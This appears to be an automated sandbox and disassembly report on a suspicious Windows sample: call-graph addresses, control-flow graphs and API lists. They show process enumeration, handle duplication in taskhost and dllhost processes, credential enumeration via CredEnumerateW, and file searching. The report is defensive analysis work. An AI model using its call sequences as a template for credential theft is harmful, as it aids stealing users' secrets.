437d3c 134 API calls 40189->40218 40265 415304 free 40189->40265 40267 425433 13 API calls 40189->40267 40268 425413 17 API calls 40189->40268 40269 42533e 16 API calls 40189->40269 40270 42538f 16 API calls 40189->40270 40271 42453e 122 API calls 40189->40271 40190 4375bc 40274 415c7d 16 API calls 40190->40274 40191->40189 40194 4375d2 40216 4373a7 40194->40216 40275 4442e6 11 API calls 40194->40275 40195->40189 40197 4375e2 40197->40216 40276 444283 13 API calls 40197->40276 40199->40189 40272 42453e 122 API calls 40202->40272 40203 4375f4 40208 437620 40203->40208 40209 43760b 40203->40209 40207 43759f 40210 416935 16 API calls 40207->40210 40212 416935 16 API calls 40208->40212 40277 444283 13 API calls 40209->40277 40210->40214 40212->40216 40214->40190 40273 42453e 122 API calls 40214->40273 40215 437612 memcpy 40215->40216 40216->40151 40218->40189 40219->40135 40220->40154 40221->40152 40222->40135 40223->40159 40224->40169 40225->40165 40226->40159 40227->40159 40229 41bc3b 100 API calls 40228->40229 40230 41f1b4 40229->40230 40231 41edad 85 API calls 40230->40231 40238 41f282 40230->40238 40232 41f1cb 40231->40232 40233 41f1f5 memcmp 40232->40233 40234 41f20e 40232->40234 40232->40238 40233->40234 40235 41f21b memcmp 40234->40235 40234->40238 40236 41f326 40235->40236 40239 41f23d 40235->40239 40237 41ee6b 85 API calls 40236->40237 40236->40238 40237->40238 40238->40178 40239->40236 40240 41f28e memcmp 40239->40240 40242 41c8df 55 API calls 40239->40242 40240->40236 40241 41f2a9 40240->40241 40241->40236 40244 41f308 40241->40244 40245 41f2d8 40241->40245 40243 41f269 40242->40243 40243->40236 40246 41f287 40243->40246 40247 41f27a 40243->40247 40244->40236 40251 4446ce 11 API calls 40244->40251 40248 41ee6b 85 API calls 40245->40248 40246->40240 40249 41ee6b 85 API calls 40247->40249 40250 41f2e0 40248->40250 40249->40238 40252 41b1ca memset 40250->40252 40251->40236 40252->40238 40253->40178 40254->40178 40255->40178 40256->40172 40257->40173 40259 417044 40258->40259 40260 41705c 40258->40260 40262 416760 11 API calls 40259->40262 40264 417055 40259->40264 40261 417075 40260->40261 40263 41707a 11 API calls 40260->40263 40261->40184 40262->40264 40263->40259 40264->40184 40265->40189 40266->40216 40267->40189 40268->40189 40269->40189 40270->40189 40271->40189 40272->40207 40273->40190 40274->40194 40275->40197 40276->40203 40277->40215 40283 415cfe 40278->40283 40287 415d23 __aullrem __aulldvrm 40283->40287 40290 41628e 40283->40290 40284 4163ca 40297 416422 11 API calls 40284->40297 40286 416172 memset 40286->40287 40287->40284 40287->40286 40288 416422 10 API calls 40287->40288 40289 415cb9 10 API calls 40287->40289 40287->40290 40288->40287 40289->40287 40291 416520 40290->40291 40292 416527 40291->40292 40296 416574 40291->40296 40294 416544 40292->40294 40292->40296 40298 4156aa 11 API calls 40292->40298 40295 416561 memcpy 40294->40295 40294->40296 40295->40296 40296->40088 40297->40290 40298->40294 40320 41493c EnumResourceNamesW 39609 4287c1 39610 4287d2 39609->39610 39611 429ac1 39609->39611 39612 428818 39610->39612 39613 42881f 39610->39613 39632 425711 39610->39632 39623 425ad6 39611->39623 39679 415c56 11 API calls 39611->39679 39646 42013a 39612->39646 39674 420244 96 API calls 39613->39674 39617 4260dd 39673 424251 119 API calls 39617->39673 39619 4259da 39672 416760 11 API calls 39619->39672 39624 429a4d 39629 429a66 39624->39629 39630 429a9b 39624->39630 39627 422aeb memset memcpy memcpy 39627->39632 39675 415c56 11 API calls 39629->39675 39633 429a96 39630->39633 39677 416760 11 API calls 39630->39677 39632->39611 39632->39619 39632->39624 39632->39627 39634 4260a1 39632->39634 39642 4259c2 39632->39642 39645 425a38 39632->39645 39662 4227f0 memset memcpy 39632->39662 39663 422b84 15 API calls 39632->39663 39664 422b5d memset memcpy memcpy 39632->39664 39665 422640 13 API calls 39632->39665 39667 4241fc 11 API calls 39632->39667 39668 42413a 89 API calls 39632->39668 39678 424251 119 API calls 39633->39678 39671 415c56 11 API calls 39634->39671 39635 429a7a 39676 416760 11 API calls 39635->39676 39642->39623 39666 415c56 11 API calls 39642->39666 39645->39642 39669 422640 13 API calls 39645->39669 39670 4226e0 12 API calls 39645->39670 39647 42014c 39646->39647 39650 420151 39646->39650 39689 41e466 96 API calls 39647->39689 39649 420162 39649->39632 39650->39649 39651 4201b3 39650->39651 39652 420229 39650->39652 39653 4201b8 39651->39653 39654 4201dc 39651->39654 39652->39649 39655 41fd5e 85 API calls 39652->39655 39680 41fbdb 39653->39680 39654->39649 39659 4201ff 39654->39659 39686 41fc4c 39654->39686 39655->39649 39659->39649 39661 42013a 96 API calls 39659->39661 39661->39649 39662->39632 39663->39632 39664->39632 39665->39632 39666->39619 39667->39632 39668->39632 39669->39645 39670->39645 39671->39619 39672->39617 39673->39623 39674->39632 39675->39635 39676->39633 39677->39633 39678->39611 39679->39619 39681 41fbf8 39680->39681 39684 41fbf1 39680->39684 39694 41ee26 39681->39694 39685 41fc39 39684->39685 39704 4446ce 11 API calls 39684->39704 39685->39649 39690 41fd5e 39685->39690 39687 41ee6b 85 API calls 39686->39687 39688 41fc5d 39687->39688 39688->39654 39689->39650 39692 41fd65 39690->39692 39691 41fdab 39691->39649 39692->39691 39693 41fbdb 85 API calls 39692->39693 39693->39692 39695 41ee41 39694->39695 39696 41ee32 39694->39696 39705 41edad 39695->39705 39708 4446ce 11 API calls 39696->39708 39699 41ee3c 39699->39684 39702 41ee58 39702->39699 39710 41ee6b 39702->39710 39704->39685 39714 41be52 39705->39714 39708->39699 39709 41eb85 11 API calls 39709->39702 39711 41ee70 39710->39711 39712 41ee78 39710->39712 39767 41bf99 85 API calls 39711->39767 39712->39699 39715 41be6f 39714->39715 39716 41be5f 39714->39716 39722 41be8c 39715->39722 39746 418c63 memset memset 39715->39746 39745 4446ce 11 API calls 39716->39745 39718 41be69 39718->39699 39718->39709 39720 41bee7 39720->39718 39750 41a453 85 API calls 39720->39750 39722->39718 39722->39720 39723 41bf3a 39722->39723 39724 41bed1 39722->39724 39749 4446ce 11 API calls 39723->39749 39726 41bef0 39724->39726 39729 41bee2 39724->39729 39726->39720 39727 41bf01 39726->39727 39728 41bf24 memset 39727->39728 39730 41bf14 39727->39730 39747 418a6d memset memcpy memset 39727->39747 39728->39718 39735 41ac13 39729->39735 39748 41a223 memset memcpy memset 39730->39748 39734 41bf20 39734->39728 39736 41ac52 39735->39736 39737 41ac3f memset 39735->39737 39740 41ac6a 39736->39740 39751 41dc14 19 API calls 39736->39751 39738 41acd9 39737->39738 39738->39720 39742 41aca1 39740->39742 39752 41519d 39740->39752 39742->39738 39743 41acc0 memset 39742->39743 39744 41accd memcpy 39742->39744 39743->39738 39744->39738 39745->39718 39746->39722 39747->39730 39748->39734 39749->39720 39751->39740 39755 4175ed 39752->39755 39763 417570 SetFilePointer 39755->39763 39758 41760a ReadFile 39759 417637 39758->39759 39760 417627 GetLastError 39758->39760 39761 4151b3 39759->39761 39762 41763e memset 39759->39762 39760->39761 39761->39742 39762->39761 39764 4175b2 39763->39764 39765 41759c GetLastError 39763->39765 39764->39758 39764->39761 39765->39764 39766 4175a8 GetLastError 39765->39766 39766->39764 39767->39712 39768 417bc5 39770 417c61 39768->39770 39774 417bda 39768->39774 39769 417bf6 UnmapViewOfFile CloseHandle 39769->39769 39769->39774 39772 417c2c 39772->39774 39780 41851e 18 API calls 39772->39780 39774->39769 39774->39770 39774->39772 39775 4175b7 39774->39775 39776 4175d6 CloseHandle 39775->39776 39777 4175c8 39776->39777 39778 4175df 39776->39778 39777->39778 39779 4175ce Sleep 39777->39779 39778->39774 39779->39776 39780->39772 39600 4147f3 39603 414561 39600->39603 39602 414813 39604 41456d 39603->39604 39605 41457f GetPrivateProfileIntW 39603->39605 39608 4143f1 memset _itow WritePrivateProfileStringW 39604->39608 39605->39602 39607 41457a 39607->39602 39608->39607

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                      • API String ID: 708747863-3398334509
                                                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                      APIs
                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                      APIs
                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1355100292-0
                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$FirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 1690352074-0
                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoSystemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3558857096-0
                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
